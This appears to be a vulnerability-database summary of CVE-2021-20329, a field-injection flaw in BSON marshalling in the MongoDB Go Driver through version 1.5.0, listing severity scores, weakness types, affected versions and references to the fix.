CVE-2021-20329
Vulnerability Summary
Timeline
Description
Specific cstrings input may not be properly validated in the MongoDB Go Driver when marshalling Go objects into BSON. A malicious user could use a Go object with specific string to potentially inject additional fields into marshalled documents. This issue affects all MongoDB GO Drivers prior to and including 1.5.0.
CVSS Metrics
- v3.1•MEDIUM•Score: 6.8CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N
- v3.1•MEDIUM•Score: 6.5CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
- v2.0•MEDIUM•Score: 4AV:N/AC:L/Au:S/C:N/I:P/A:N
EPSS Trends
Current EPSS score: 0.14%• Percentile: 34%
Techniques & Countermeasures
- CWE-20•Improper Input Validation
The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly.
- CWE-1287•Improper Validation of Specified Type of Input
The product receives input that is expected to be of a certain type, but it does not validate or incorrectly validates that the input is actually of the expected type.
Affected Systems
- go.mongodb.org•mongo-driver
< 1.5.1
- mongodb inc.•mongodb go driver
≥ 1.0, ≤ 1.5.0
- mongodb•go_driver
≤ 1.5.0
References (7)
- https://github.com/mongodb/mongo-go-driver/releases/tag/v1.5.1
- https://nvd.nist.gov/vuln/detail/CVE-2021-20329
- https://github.com/mongodb/mongo-go-driver/pull/622
- https://github.com/mongodb/mongo-go-driver/commit/2aca31d5986a9e1c65a92264736de9fdc3b9b4ca
- https://github.com/mongodb/mongo-go-driver
- https://jira.mongodb.org/browse/GODRIVER-1923
- https://pkg.go.dev/vuln/GO-2021-0112